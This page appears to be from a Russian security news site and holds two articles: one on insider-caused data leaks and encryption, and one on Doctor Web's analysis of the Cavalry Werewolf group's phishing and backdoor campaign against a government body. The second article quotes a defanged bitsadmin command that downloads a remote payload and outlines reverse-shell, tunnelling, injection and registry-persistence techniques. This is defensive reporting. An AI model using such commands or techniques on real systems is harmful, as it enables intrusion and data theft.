Большинство утечек происходит по вине инсайдеров

Большинство утечек происходит по вине инсайдеров

Ленты новостей об информационной безопасности могут создать обманчивое впечатление, что корпоративные сети постоянно находятся под угрозой взлома какой-либо организованной киберпреступной группировкой, стремящейся похитить всю секретную информацию компаний. Громкие заголовки, кричащие об активности хакеров, хороши для СМИ, но, в то же время, подобный подход к освещению инцидентов с утечками данных может отвлечь внимание от гораздо более вероятных рисков, угрожающих информационной безопасности компании.

Безусловно, нельзя недооценивать значимость защиты от внешних угроз. Однако не менее важно обеспечить надежную  защиту корпоративных данных от утечек, происходящих по вине сотрудников компании. Например, если отмечается всплеск нарушений политик информационной безопасности в финансовых организациях, необходимо усиливать сетевую защиту и поддерживать антивирусные базы в актуальном состоянии. В случае роста числа инцидентов с конфиденциальными данными необходимо учитывать человеческий фактор как одну из самых частых и наиболее значимых причин утечки информации, передает infowatch.ru.

Ссылаясь на исследования аналитической компании Forrester, обозреватель журнала PC World Джон Данн (John Dunn) отметил, что внешние атаки составляют лишь около четверти от общего числа инцидентов. Между тем, потери и кражи мобильных носителей информации являются причиной 31% утечек, еще 27% вызваны некорректным использованием прав доступа.  Это означает, что в 58% случаях утечка данных происходит неумышленно, и риск такого нарушения может быть сведен к минимуму за счет эффективного использования технологий шифрования данных.

«Это не только вопрос наличия соответствующих инструментов управления, – говорит исследователь Хайди Шей (Heidi Shey). – Следует отметить, что по результатам опроса, проведенного в Северной Америке и Европе, только 56% сотрудников, работающих с чувствительной информацией,  знают о положениях политики безопасности своей организации».

Также в качестве сдерживающей силы в рамках реализации задач по защите данных в статье упоминаются мобильные тенденции, такие как распространение практики BYOD. По мнению обозревателя TechNewsWorldРичарда Адхикари (Richard Adhikari), обеспечение безопасности мобильных устройств становится все более важной задачей по мере роста количества вредоносных программ, специально разрабатываемых под мобильные платформы. Несмотря на растущие объемы данных, хранимых на мобильных устройствах, BYOD не единственная угроза информационной безопасности.

Хайди Шей особо подчеркнула, что понимание сотрудниками корпоративных политик безопасности не менее важно, чем использование технологий защиты данных в компании.

Комментарий главного аналитика InfoWatch Николая Федотова: «Шифрование данных действительно избавляет от очень большого процента утечек. Но, решая проблемы конфиденциальности, оно создаёт проблемы доступности.

Наши опросы говорят, что препятствием ко внедрению шифрования данных являются вовсе не дополнительная нагрузка на процессор и каналы связи.

Главной проблемой людям видится риск потери доступа к шифрованным данным при каких-либо технических сбоях или утрате ключей, а также проблема совместимости при передаче или доступе к данным с разных компьютеров.

Но поскольку стоимость информации неуклонно растёт (как её стоимость для обладателя, так и потенциальный ущерб в случае разглашения), то шифрование внедряется с каждым годом всё шире».

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Группировка Cavalry Werewolf взломала сеть госоргана с помощью бэкдоров

В июле 2025 года к специалистам компании «Доктор Веб» обратился клиент из госсектора с жалобой на рассылку подозрительных писем с корпоративного почтового ящика. Расследование показало: перед ними была целевая кампания кибергруппировки, которую аналитики идентифицировали как Cavalry Werewolf.

Цель атаки — сбор конфиденциальной информации и картирование сети для дальнейшего закрепления внутри инфраструктуры.

Начали злоумышленники банально, но эффективно — с фишинга. В качестве «приманки» приходили архивы с паролем и вложенным бэкдором BackDoor.ShellNET.1 (основан на открытом проекте Reverse-Shell-CS). Файлы маскировались под служебные записки и другие официальные документы — имена были соответствующие, чтобы снизить бдительность получателя.

 

После запуска BackDoor.ShellNET.1 атакующие использовали стандартный для Windows инструмент bitsadmin для скачивания дополнительных полезных нагрузок (пример: bitsadmin /transfer www /download hxxp://…/winpot.exe). Среди загруженных модулей оказался стилер Trojan.FileSpyNET.5, который массово тянул документы (.doc/.docx/.xlsx/.pdf), текстовые файлы и изображения. Для скрытого доступа применяли BackDoor.Tunnel.41 (вариант ReverseSocks5) — с его помощью создавались SOCKS5-туннели и обеспечивалось скрытое подключение к заражённому ПК.

Дальше — больше: специалисты «Доктор Веб» обнаружили целый набор инструментов, как собственных, так и основанных на open-source. В арсенале группировки — скриптовые загрузчики (например, BAT.DownLoader.1138), «упакованные» трояны (Trojan.Packed2.49708, Trojan.Siggen31.54011 и т. п.), бэкдоры, управляемые через телеграм-ботов (BackDoor.Siggen2.5463, BackDoor.ShellNET.2), а также прокси-модули типа BackDoor.ReverseProxy.1. Некоторые варианты внедряли полезную нагрузку в легитимные процессы — например, инжектировали данные в aspnet_compiler.exe, чтобы бэкдор выполнялся в контексте доверенного приложения.

 

Интересно, что злоумышленники активно пользуются открытими решениями: либо берут код «как есть», либо модифицируют его под свои нужды. Для доставки следующей волны вредоносов они используют стандартные утилиты — PowerShell, bitsadmin, curl — а для сохранения присутствия в системе модифицируют автозагрузку через реестр (HKCU\...\Run) или ставят исполняемые файлы в C:\users\public\pictures и похожие публичные папки.

Атака Cavalry Werewolf показала типичную для целевых кампаний логику: разведка (whoami, ipconfig, просмотр директорий), проверка прокси и сети, затем загрузка инструментов и закрепление. Также злоумышленники могли позже использовать скомпрометированные устройства для перехода в другие сети — например, при смене работы жертвы — и разворачивать дальнейшие атаки через доверенные каналы.

Отдельные особенности группировки, которые отмечают аналитики «Доктор Веб»: предпочтение к open-source-инструментам, частое использование обратных шеллов и SOCKS-туннелей, внедрение вреда в видимо «безобидные» программы и управление через Telegram API. Фишинговые рассылки имитируют сообщения от государственных органов — это снижает подозрительность целевой аудитории и повышает шансы успешной компрометации.

Рекомендации для организаций — стандартный, но действенный набор мер: усилить фильтрацию почты и блокировку подозрительных вложений, ограничить возможность запуска bitsadmin/PowerShell неподписанных скриптов, включить контроль исполнения (application control) и EDR, регулярно проверять целевые публичные папки, применять многофакторную аутентификацию и оперативно реагировать на подозрительные соединения с неизвестными C2-адресами. При обнаружении инцидента — немедленно изолировать пострадавшие хосты и провести полноценную форензику, чтобы выявить степень компрометации.

Расследование «Доктор Веб» — ещё одно напоминание: даже крупные организации с государственным уровнем защиты уязвимы к грамотному фишингу и тому, что за ним следует. В современных целевых атаках именно сочетание человеческой ошибки и хорошо отлаженных инструментов злоумышленников делает наибольший ущерб.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru